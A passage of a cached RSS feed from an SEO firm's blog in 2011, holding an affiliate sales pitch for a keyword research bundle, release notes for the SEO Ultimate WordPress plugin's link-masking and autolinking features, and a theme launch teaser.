<strong>where the money is</strong>, and whether or not there is commercial intent, you can tactfully implement <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-video-how-to-properly-silo-your-website/\">website silo architecture</a> to scale a plethora of lucrative keywords (like layers of an onion) through using one or multiple websites.</p>\n<p>Using multiple properties allows you to liberate your revenue model from being overly dependent on any one property. To accomplish this feat, you need a solid strategy and system based repeatability that targets entire cluster of phrases, (The DNA Braid) vs. a few poultry keywords.</p>\n<h3>The DNA Braid Module</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"369\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/UU61MNyQKvw?version=3&amp;hl=en_US&amp;rel=0\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"369\" src=\"http://www.youtube.com/v/UU61MNyQKvw?version=3&amp;hl=en_US&amp;rel=0\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Would you rather rank for one keyword or rank for hundreds to thousands of keywords, that allow you to reach that “one” keyword faster while you enjoy the fruit of <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-rankings-and-how-to-create-them/\">keyword stemming</a> (ranking for stemmed variations) along the way?</p>\n<p>Time is the real asset in SEO and the extent of the volume of work you can accomplish depends on the tools you have at your disposal, and the team that you have to implement those tactics; especially when it comes to SEO and competing in saturated markets.</p>\n<p>To use an analogy, working with the wrong tools (against a seasoned competitor) is like bringing 3 men to a battle when your adversary has an army. No matter what strategy you implement (with those 3 men) their limited scope and resources will fall short when <strong>the numbers game</strong> creeps into the equation.</p>\n<p>For a website to knock an authority site off the pedestal of the #1 position, it needs both (1) a foundation that is broad enough to support the ascent (by leveraging semantically structured supporting content) and (2) enough vertical milestones (categories and landing pages) to reach the apex for the primary phrase. This means for competitive markets, you may require thousands of pages (to support the mid tail and lucrative / competitive keywords) and dozens to hundreds of links to critical internal pages to reach the aggregate tipping point to reach the apex of a market.</p>\n<p>But also keep in mind, that for every primary keyword, there are dozens of mid-tail and long-tail keywords that are equally as lucrative (if you devour the entire market along the way).</p>\n<h3>The Project Management Module</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"369\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/QiSJJP4WiAY?version=3&amp;hl=en_US&amp;rel=0\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"369\" src=\"http://www.youtube.com/v/QiSJJP4WiAY?version=3&amp;hl=en_US&amp;rel=0\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>To create websites and manage the process (using clusters and co-occurrence), you need a scalable system that allows you to (a) identify keyword and markets (b) model data, cost, time management and resources and calculate ROI from <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/the-psychology-of-a-click-through-understanding-intention-fulfillment-and-desire/\">click through rates</a>, time to rank, the volume of content and internal links required per keyword or the number of deep links you will need (<em>that was our proprietary algorithm and you can see it work in Video 1 on the silo framework module above</em>) &#8211; that is the power of DWS, Krakken and The Last Keyword Tool; that is the collective suite known as <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">Network Empire</a>.</p>\n<p>The volume and extent of the work you execute depends on the system and tools you have at your disposal, especially when SEO and competitive saturated markets are the battleground.</p>\n<p>Working with advanced SEO tools allows you to plan your roll-out with more depth, a more robust array of theme relevant supporting articles, categories and landing pages and allows you to work smarter and not harder when chipping away at market defining phrases.</p>\n<p>I have had the distinct honor of working with some of the most brilliant minds (the team from Themezoom) over the past 5 years and I can assure you that there are only a handful of people who understand and implement SEO on this level.</p>\n<p>While this was our best kept secret for years <strong>“The Krakken”</strong>, now it is time to borrow a phrase from Hades from Clash of the Titans and <strong>“Release the Krakken”!</strong></p>\n<p>This suite will allow you to walk into a market cold and within 20 minutes have the creamy keywords that float to the top in which to base your existing legacy site (by breathing life into it with a new blog) or start anew and scale the market in a fraction of the time.</p>\n<p>If you are struggling to find theme relevant keywords (based on sophisticated information retrieval algorithms such as sparse matrix clustering, co-occurrence, Bayes, PaIR, LSI and semantic connectivity) then the Krakken (which drills into 60-90,000 keywords in under 5 minutes) only brings you back phrases which are (1) theme relevant to the parent cluster (original keyword) and (2) either have organic search value or PPC search value.</p>\n<p>When you continue to refine, add synonyms and keep drilling, you end up with the perfect blueprint (like a skeleton) in which to build out your website into a robust authority site or niche specific entity.</p>\n<p>This means that if you include these phrases (in their respective website silo architecture) then the entire cluster gets devoured and you rank for more keywords with fewer inbound links (since your own website becomes its own PageRank and link-flow spewing, top 10 ranking juggernaut).</p>\n<p>Keep in mind that the Krakken transcends ordinary keyword research and uses the same type of natural data hierarchy information retrieval structures (such as Google, Yahoo and Bing) use to ascertain relevance.</p>\n<p>In short, a blueprint from the Krakken is like mirroring the ideal on page SEO elements, synonyms and synonymic sets search engines grade relevance score with as a conditional metric when analyzing authoritative websites and sorting the wheat from the chaff for positioning.</p>\n<p>Rarely would I share the exact tools we use to inspect, enter and  dominate markets, but in the spirit of the New Year I do have one  special offer I have been permitted to pass along (for a very limited  time) to all of you who either get our email / blog posts, read  whitepapers and updates from our plugin SEO Ultimate or know who we are  and what we do.</p>\n<p>In this special offer you get the opportunity to (1) unleash the Krakken in your market (2) it’s powerful and quite formidable little brother “The Last Keyword Tool” and (3) the DWS (Domain Web Studio) the most powerful SEO management suite ever conceived for:</p>\n<p><strong>a)</strong> mapping out markets</p>\n<p><strong>b)</strong> creating properly themed websites with silo site architecture</p>\n<p><strong>c)</strong> managing all elements of the campaign from outsourcing content creation, project management, web development and SEO tasks and most importantly</p>\n<p><strong>d)</strong> having a syndication blueprint that creates a timeline for every keyword, assesses its cost, time to rank, ROI and even lets you know how to cross the tipping-point with every keyword in a blueprint.</p>\n<p>Put simply, this bundle is a must! We have paid $12,000 a year just to use the Krakken, in this offer, you will have to <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">click and see for yourself</a> the savings you can receive.</p>\n<p>Do yourself a favor; you can win the battle before you even step on the field. I speak from experience on this one, we can do more in less time and completely crush seasoned competitors (such as brands, Wikipedia results, Amazon, Target, Wal-mart and other “strong sites”) using the formula’s developed from building sites (and links) in tandem with a search engines natural data hierarchy – and that is what you will learn from using this suite .</p>\n<p>In essence, Network Empire silently slays competitors and uses unstoppable algorithms (that search engines love and reward), and now, for a limited time you can save hundreds by <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">following this link</a> and getting your subscription for a hefty discount.</p>\n<p>In closing, for those naysayers, here are links to an exclusive webinar on the DWS 3.5 launch and other videos on the Krakken and The Last Keyword Tool.</p>\n<p>This is not a marketing ploy; this is a special offer with bona fide savings for those of you who are serious about dominating your market. This offer will not last and will be pulled in the next 24-48 hours. Act now, or pay full price later. I leave the rest to you…</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5QuEJFZhVcg:Ocd5kHoh-_M:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5QuEJFZhVcg\" height=\"1\" width=\"1\"/>\";}i:20;a:12:{s:5:\"title\";s:56:\"SEO Ultimate WordPress SEO Plugin Version 7.2.1 Released\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/nLTz4RFbIKc/\";s:8:\"category\";s:25:\"WordPress SEOSEO Ultimate\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"John Lamansky\";}s:7:\"pubdate\";s:29:\"Sat, 31 Dec 2011 15:37:34 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9069\";s:7:\"content\";a:1:{s:7:\"encoded\";s:7872:\"<p>SEO Ultimate (the free WordPress SEO plugin from <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions</a>) has seen 4 new releases in the last few weeks. Here&#8217;s the scoop on the latest features:</p>\n<div id=\"attachment_9074\" class=\"wp-caption aligncenter\" style=\"width: 403px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-7-2-1/\"><img class=\"size-full wp-image-9074\" title=\"seo-ultimate-7-1-2\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/12/seo-ultimate-7-1-2.jpg\" alt=\"\" width=\"393\" height=\"251\" /></a><p class=\"wp-caption-text\">Take WordPress and Rankings to a Higher Level with SEO Ultimate.</p></div>\n<h3>Global Link Mask Admin Interface</h3>\n<p>The Link Mask Generator module, which first came out almost exactly a year ago, has been overhauled with a brand new administration interface that lets you create link masks that apply globally across your entire WordPress-powered website.<span id=\"more-9069\"></span></p>\n<p>As in previous versions of SEO Ultimate, Link Mask Generator scans your posts for links and gives you the option of generating an alternate URL that redirects to the &#8220;real&#8221; URL.</p>\n<p>For example, if your post contains a link to www.amazon.com, you can use Link Mask Generator to change that link URL to www.your-website.tld/go/amazon/. When your visitors click the link to go to www.your-website.tld/go/amazon/, they are seamlessly redirected to the original URL at www.amazon.com.</p>\n<p>Link masking has two benefits: First, it lets you replace lengthy affiliate URLs with short, clean, internal URL masks (using 301 redirects, which have no search engine penalty). Second, Link Mask Generator automatically generates robots.txt rules that disallow your masked URLs, effectively neutering the juice-flow of the link, without resorting to the rel nofollow attribute. This combination makes Link Mask Generator a perfect tool for affiliate marketers.</p>\n<p>The latest releases of SEO Ultimate expand on this existing functionality by adding a new global interface which lets you see all your link masks in one place and which lets you apply a link mask globally instead of just to one post as before.</p>\n<p>Just go to the new &#8220;Link Mask Generator&#8221; menu item under SEO Ultimate&#8217;s &#8220;SEO&#8221; menu in your WordPresss admin to view and edit the alias list. The alias table includes a field for the actual URL (e.g. www.amazon.com), a field for the alias URL (e.g. /go/amazon/), a &#8220;test&#8221; link that lets you check that the alias URL is working, and an optional &#8220;Only on This Post&#8221; field that lets you limit the application of the link mask to a specific post (thereby emulating the functionality of the previous version of Link Mask Generator).</p>\n<p>If you have an affiliate URL that you use in multiple posts across your entire site, the new version of Link Mask Generator lets you mask all instances of that URL in one fell swoop.</p>\n<h3>Deeplink Juggernaut &amp; Link Mask Generator Integration</h3>\n<p>One of the great things about having all your SEO features in one plugin is that the modules can integrate with each other. Deeplink Juggernaut and Link Mask Generator can now work together starting with SEO Ultimate 7.1, allowing you to use link masks as autolinking destinations in Deeplink Juggernaut.</p>\n<p>Let&#8217;s say you&#8217;ve already used Link Mask Generator to mask all your www.amazon.com links with internal /go/amazon/ URLs. Now let&#8217;s say you want to autolink all instances of the word &#8220;Amazon&#8221; to your new /go/amazon/ URL. Just go to the &#8220;Add a New Link&#8221; section of the &#8220;Content Links&#8221; tab of Deeplink Juggernaut, type &#8220;Amazon&#8221; in the &#8220;Anchor Text&#8221; box, and type &#8220;amazon&#8221; in the &#8220;Destination&#8221; box. Then click the /go/amazon/ item that appears in the dropdown beneath the &#8220;Destination&#8221; box. Then just click Save Changes to add the new autolink.</p>\n<p>Now all instances of the word &#8220;Amazon&#8221; (in our example) will autolink to http://www.your-website.tld/go/amazon/. When a visitor clicks the link, he or she will be silently redirected to the original URL at www.amazon.com.</p>\n<p>This conjunction of Deeplink Juggernaut and Link Mask Generator functionality is a perfect combo for affiliate marketers looking to autolink all instances of a relevant keyword to a masked affiliate URL.</p>\n<h3>More Features, Changes, &amp; Fixes</h3>\n<p>Those 2 features are the headline additions to the latest versions of SEO Ultimate, but there&#8217;s even more worth mentioning:</p>\n<ul>\n<li>Permalink Tweaker now includes a new setting that lets you handle URL conflicts between pages and categories/tags that can arise when you use Permalink Tweaker to remove category/tag URL bases. For example, if you have a category called &#8220;Blue Widgets&#8221; and a page called &#8220;Blue Widgets,&#8221; and if you have configured Permalink Tweaker to remove the /category/ portion of your categories&#8217; URLs, then both the page and the category will have the URL of http://www.your-website.tld/blue-widgets/. As of SEO Ultimate 7.2, Permalink Tweaker includes a new &#8220;URL Conflict Resolution&#8221; setting that lets you choose whether the category or the page should get the URL in case of a conflict.</li>\n<li>In previous versions of SEO Ultimate, modules had multiple help dropdowns (in the upper-right-hand corner of the module admin pages) containing module documentation, such as &#8220;Overview,&#8221; &#8220;FAQ,&#8221; &#8220;Troubleshooting,&#8221; etc. As of version 7.0 and later, SEO Ultimate now uses the new help system of WordPress 3.3 that places all these documentation sections into a single &#8220;Help&#8221; dropdown with multiple tabs.</li>\n<li>Deeplink Juggernaut&#8217;s &#8220;Tag Restrictions&#8221; setting should now handle nested tags with aplomb. If you&#8217;ve configured Deeplink Juggernaut to refrain from autolinking within &lt;h3&gt; tags, for example, this setting will now take effect even if that &lt;h3&gt; tag has a nested &lt;span&gt; tag or &lt;br /&gt; tag. If this bug has been giving you trouble, upgrade to SEO Ultimate 7.2.1 or later and let us know whether the fix is working for you.</li>\n<li>Meta Description Editor now lets you differentiate your meta descriptions on paginated subpages of categories, tags, and pages. For example, you can use Meta Description Editor to automatically tack on &#8220;Page 2&#8243; to the end of the meta description of page 2 of a category archive. This new feature helps avoid &#8220;duplicate meta description&#8221; errors in Google Webmaster Tools.</li>\n</ul>\n<p>Download version 7.2.1 today to enjoy the new features and multiple enhancements. If you&#8217;re already one of the thousands who use SEO Ultimate, you can upgrade for free via your WordPress plugin admin section. If you&#8217;re a new user who&#8217;d like to take advantage of this powerful free plugin, you can <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">download it from WordPress.org</a> or search for &#8220;SEO Ultimate&#8221; on your blog&#8217;s plugin install screen.</p>\n<p>Also, you can view or download <strong>All of SEO Ultimate&#8217;s Features</strong> by right-clicking and saving this convenient PDF file (<a href=\"http://www.seodesignsolutions.com/wordpress-seo/SEO_Ultimate_Feature_List.pdf\">The SEO Ultimate Feature List</a>).</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=nLTz4RFbIKc:nB5tfGv9-p8:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/nLTz4RFbIKc\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:335:\"SEO Ultimate (the free WordPress SEO plugin from SEO Design Solutions) has seen 4 new releases in the last few weeks. Here&#8217;s the scoop on the latest features: Global Link Mask Admin Interface The Link Mask Generator module, which first came out almost exactly a year ago, has been overhauled with a brand new administration [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"15\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:72:\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-7-2-1/\";}s:7:\"summary\";s:335:\"SEO Ultimate (the free WordPress SEO plugin from SEO Design Solutions) has seen 4 new releases in the last few weeks. Here&#8217;s the scoop on the latest features: Global Link Mask Admin Interface The Link Mask Generator module, which first came out almost exactly a year ago, has been overhauled with a brand new administration [...]\";s:12:\"atom_content\";s:7872:\"<p>SEO Ultimate (the free WordPress SEO plugin from <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions</a>) has seen 4 new releases in the last few weeks. Here&#8217;s the scoop on the latest features:</p>\n<div id=\"attachment_9074\" class=\"wp-caption aligncenter\" style=\"width: 403px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-7-2-1/\"><img class=\"size-full wp-image-9074\" title=\"seo-ultimate-7-1-2\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/12/seo-ultimate-7-1-2.jpg\" alt=\"\" width=\"393\" height=\"251\" /></a><p class=\"wp-caption-text\">Take WordPress and Rankings to a Higher Level with SEO Ultimate.</p></div>\n<h3>Global Link Mask Admin Interface</h3>\n<p>The Link Mask Generator module, which first came out almost exactly a year ago, has been overhauled with a brand new administration interface that lets you create link masks that apply globally across your entire WordPress-powered website.<span id=\"more-9069\"></span></p>\n<p>As in previous versions of SEO Ultimate, Link Mask Generator scans your posts for links and gives you the option of generating an alternate URL that redirects to the &#8220;real&#8221; URL.</p>\n<p>For example, if your post contains a link to www.amazon.com, you can use Link Mask Generator to change that link URL to www.your-website.tld/go/amazon/. When your visitors click the link to go to www.your-website.tld/go/amazon/, they are seamlessly redirected to the original URL at www.amazon.com.</p>\n<p>Link masking has two benefits: First, it lets you replace lengthy affiliate URLs with short, clean, internal URL masks (using 301 redirects, which have no search engine penalty). Second, Link Mask Generator automatically generates robots.txt rules that disallow your masked URLs, effectively neutering the juice-flow of the link, without resorting to the rel nofollow attribute. This combination makes Link Mask Generator a perfect tool for affiliate marketers.</p>\n<p>The latest releases of SEO Ultimate expand on this existing functionality by adding a new global interface which lets you see all your link masks in one place and which lets you apply a link mask globally instead of just to one post as before.</p>\n<p>Just go to the new &#8220;Link Mask Generator&#8221; menu item under SEO Ultimate&#8217;s &#8220;SEO&#8221; menu in your WordPresss admin to view and edit the alias list. The alias table includes a field for the actual URL (e.g. www.amazon.com), a field for the alias URL (e.g. /go/amazon/), a &#8220;test&#8221; link that lets you check that the alias URL is working, and an optional &#8220;Only on This Post&#8221; field that lets you limit the application of the link mask to a specific post (thereby emulating the functionality of the previous version of Link Mask Generator).</p>\n<p>If you have an affiliate URL that you use in multiple posts across your entire site, the new version of Link Mask Generator lets you mask all instances of that URL in one fell swoop.</p>\n<h3>Deeplink Juggernaut &amp; Link Mask Generator Integration</h3>\n<p>One of the great things about having all your SEO features in one plugin is that the modules can integrate with each other. Deeplink Juggernaut and Link Mask Generator can now work together starting with SEO Ultimate 7.1, allowing you to use link masks as autolinking destinations in Deeplink Juggernaut.</p>\n<p>Let&#8217;s say you&#8217;ve already used Link Mask Generator to mask all your www.amazon.com links with internal /go/amazon/ URLs. Now let&#8217;s say you want to autolink all instances of the word &#8220;Amazon&#8221; to your new /go/amazon/ URL. Just go to the &#8220;Add a New Link&#8221; section of the &#8220;Content Links&#8221; tab of Deeplink Juggernaut, type &#8220;Amazon&#8221; in the &#8220;Anchor Text&#8221; box, and type &#8220;amazon&#8221; in the &#8220;Destination&#8221; box. Then click the /go/amazon/ item that appears in the dropdown beneath the &#8220;Destination&#8221; box. Then just click Save Changes to add the new autolink.</p>\n<p>Now all instances of the word &#8220;Amazon&#8221; (in our example) will autolink to http://www.your-website.tld/go/amazon/. When a visitor clicks the link, he or she will be silently redirected to the original URL at www.amazon.com.</p>\n<p>This conjunction of Deeplink Juggernaut and Link Mask Generator functionality is a perfect combo for affiliate marketers looking to autolink all instances of a relevant keyword to a masked affiliate URL.</p>\n<h3>More Features, Changes, &amp; Fixes</h3>\n<p>Those 2 features are the headline additions to the latest versions of SEO Ultimate, but there&#8217;s even more worth mentioning:</p>\n<ul>\n<li>Permalink Tweaker now includes a new setting that lets you handle URL conflicts between pages and categories/tags that can arise when you use Permalink Tweaker to remove category/tag URL bases. For example, if you have a category called &#8220;Blue Widgets&#8221; and a page called &#8220;Blue Widgets,&#8221; and if you have configured Permalink Tweaker to remove the /category/ portion of your categories&#8217; URLs, then both the page and the category will have the URL of http://www.your-website.tld/blue-widgets/. As of SEO Ultimate 7.2, Permalink Tweaker includes a new &#8220;URL Conflict Resolution&#8221; setting that lets you choose whether the category or the page should get the URL in case of a conflict.</li>\n<li>In previous versions of SEO Ultimate, modules had multiple help dropdowns (in the upper-right-hand corner of the module admin pages) containing module documentation, such as &#8220;Overview,&#8221; &#8220;FAQ,&#8221; &#8220;Troubleshooting,&#8221; etc. As of version 7.0 and later, SEO Ultimate now uses the new help system of WordPress 3.3 that places all these documentation sections into a single &#8220;Help&#8221; dropdown with multiple tabs.</li>\n<li>Deeplink Juggernaut&#8217;s &#8220;Tag Restrictions&#8221; setting should now handle nested tags with aplomb. If you&#8217;ve configured Deeplink Juggernaut to refrain from autolinking within &lt;h3&gt; tags, for example, this setting will now take effect even if that &lt;h3&gt; tag has a nested &lt;span&gt; tag or &lt;br /&gt; tag. If this bug has been giving you trouble, upgrade to SEO Ultimate 7.2.1 or later and let us know whether the fix is working for you.</li>\n<li>Meta Description Editor now lets you differentiate your meta descriptions on paginated subpages of categories, tags, and pages. For example, you can use Meta Description Editor to automatically tack on &#8220;Page 2&#8243; to the end of the meta description of page 2 of a category archive. This new feature helps avoid &#8220;duplicate meta description&#8221; errors in Google Webmaster Tools.</li>\n</ul>\n<p>Download version 7.2.1 today to enjoy the new features and multiple enhancements. If you&#8217;re already one of the thousands who use SEO Ultimate, you can upgrade for free via your WordPress plugin admin section. If you&#8217;re a new user who&#8217;d like to take advantage of this powerful free plugin, you can <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">download it from WordPress.org</a> or search for &#8220;SEO Ultimate&#8221; on your blog&#8217;s plugin install screen.</p>\n<p>Also, you can view or download <strong>All of SEO Ultimate&#8217;s Features</strong> by right-clicking and saving this convenient PDF file (<a href=\"http://www.seodesignsolutions.com/wordpress-seo/SEO_Ultimate_Feature_List.pdf\">The SEO Ultimate Feature List</a>).</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=nLTz4RFbIKc:nB5tfGv9-p8:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/nLTz4RFbIKc\" height=\"1\" width=\"1\"/>\";}i:21;a:12:{s:5:\"title\";s:58:\"Coming Soon: The WP Ultimate Theme Framework for WordPress\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/STqwpedf5Qs/\";s:8:\"category\";s:102:\"WordPress SEOPremium WordPress SEO Theme FrameworkWordPress SEO ThemesWP UltimateWP Ultimate SEO Theme\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 19 Dec 2011 05:06:40 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9061\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2579:\"<p>After one year of toiling away in the labs, we are preparing for the launch of <strong>The WP Ultimate Theme</strong> (a powerful, flexible and dynamic premium SEO framework for WordPress) designed to work in tandem with <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> (our WordPress SEO plugin).</p>\n<div id=\"attachment_9060\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/coming-soon-the-wp-ultimate-theme-framework-for-wordpress/\"><img class=\"size-full wp-image-9060\" title=\"sneak-peak\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/12/sneak-peak.jpg\" alt=\"\" width=\"500\" height=\"185\" /></a><p class=\"wp-caption-text\">The WP Ultimate Theme: So Powerful, It Should Have Its Own Cape!</p></div>\n<p>Our objective is simple, to provide users with fine-grained control over multiple on page settings (<em>such as nearly instantaneous site architecture injection, custom navigation options, multiple layout and theme choices, breadcrumbs, internal links, widgets, typography controls and more</em>) for the optimal WordPress SEO framework.</p>\n<p>Rather than spill the beans now, I will be posting sneak previews of the features as well as preparing some unique use-case examples of how to leverage the power of WP and SEO Ultimate in tandem.</p>\n<p>If you know us by now, you know that <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions</a> is not about shallow or flimsy SEO tactics or tools; everything we do is cutting-edge and is founded on years of battle tested tactics that dominate search engines and produce real-world results by their very design.</p>\n<p>WP Ultimate is no different – there simply isn’t anything like it as a WordPress framework (more on that later) and this is not to knock the competition.</p>\n<p>Stay tuned for videos, strategies and more from our upcoming product launch (which will change the way you think about SEO Themes for WordPress once and for all).</p>\n<p>The countdown for the launch is scheduled for  1-2-2012</p>\n<p>Until the next post&#8230;</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=STqwpedf5Qs:V5hlwUELoik:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/STqwpedf5Qs\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:335:\"After one year of toiling away in the labs, we are preparing for the launch of The WP Ultimate Theme (a powerful, flexible and dynamic premium SEO framework for WordPress) designed to work in tandem with SEO Ultimate (our WordPress SEO plugin). Our objective is simple, to provide users with fine-grained control over multiple on [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"20\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:111:\"http://www.seodesignsolutions.com/blog/wordpress-seo/coming-soon-the-wp-ultimate-theme-framework-for-wordpress/\";}s:7:\"summary\";s:335:\"After one year of toiling away in the labs, we are preparing for the launch of The WP Ultimate Theme (a powerful, flexible and dynamic premium SEO framework for WordPress) designed to work in tandem with SEO Ultimate (our WordPress SEO plugin). Our objective is simple, to provide users with fine-grained control over multiple on [...]\";s:12:\"atom_content\";s:2579:\"<p>After one year of toiling away in the labs, we are preparing for the launch of <strong>The WP Ultimate Theme</strong> (a powerful, flexible and dynamic premium SEO framework for WordPress) designed to work in tandem with <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> (our WordPress SEO plugin).</p>\n<div id=\"attachment_9060\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/coming-soon-the-wp-ultimate-theme-framework-for-wordpress/\"><img class=\"size-full wp-image-9060\" title=\"sneak-peak\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/12/sneak-peak.jpg\" alt=\"\" width=\"500\" height=\"185\" /></a><p class=\"wp-caption-text\">The WP Ultimate Theme: So Powerful, It Should Have Its Own Cape!</p></div>\n<p>Our objective is simple, to provide users with fine-grained control over multiple on page settings (<em>such as nearly instantaneous site architecture injection, custom navigation options, multiple layout and theme choices, breadcrumbs, internal links, widgets, typography controls and more</em>) for the optimal WordPress SEO framework.</p>\n<p>Rather than spill the beans now, I will be posting sneak previews of the features as well as preparing some unique use-case examples of how to leverage the power of WP and SEO Ultimate in tandem.</p>\n<p>If you know us by now, you know that <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions</a> is not about shallow or flimsy SEO tactics or tools; everything we do is cutting-edge and is founded on years of battle tested tactics that dominate search engines and produce real-world results by their very design.</p>\n<p>WP Ultimate is no different – there simply isn’t anything like it as a WordPress framework (more on that later) and this is not to knock the competition.</p>\n<p>Stay tuned for videos, strategies and more from our upcoming product launch (which will change the way you think about SEO Themes for WordPress once and for all).</p>\n<p>The countdown for the launch is scheduled for  1-2-2012</p>\n<p>Until the next post&#8230;</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=STqwpedf5Qs:V5hlwUELoik:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/STqwpedf5Qs\" height=\"1\" width=\"1\"/>\";}i:22;a:12:{s:5:\"title\";s:38:\"Infographic: How Profitable is Google?\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/lnqR9zzYCuE/\";s:8:\"category\";s:119:\"Web ResourcesGoogle InfographicHow Much Does Google MakeHow Much Google Benefits from SearchHow Profitable is GoogleSEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 28 Nov 2011 16:23:45 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9051\";s:7:\"content\";a:1:{s:7:\"encoded\";s:3140:\"<p>Here are a few tantalizing tidbits of trivia for visual types who enjoy contrast and comparison courtesy of <a href=\"http://www.businessmba.org/google-facts/\">BusinessMba.org</a> called Google: Behind the Numbers.</p>\n<p>Aside from the glaring monetization prowess of <strong>&#8220;The Digital Juggernaut&#8221;</strong> known as Google, just remember <strong>&#8220;your clicks equate to revenue&#8221;.</strong></p>\n<p>Let&#8217;s take a peek <em>behind the numbers</em> from Google&#8217;s 2010 profits to answer any questions about how profitable search as a viable business model is.</p>\n<p><a href=\"http://www.businessmba.org/google-facts/\"><img src=\"http://www.businessmba.org/google-facts/google-numbers.jpg\" border=\"0\" alt=\"Google Behind The Numbers\" width=\"500\" /></a><br />\nFrom: <a 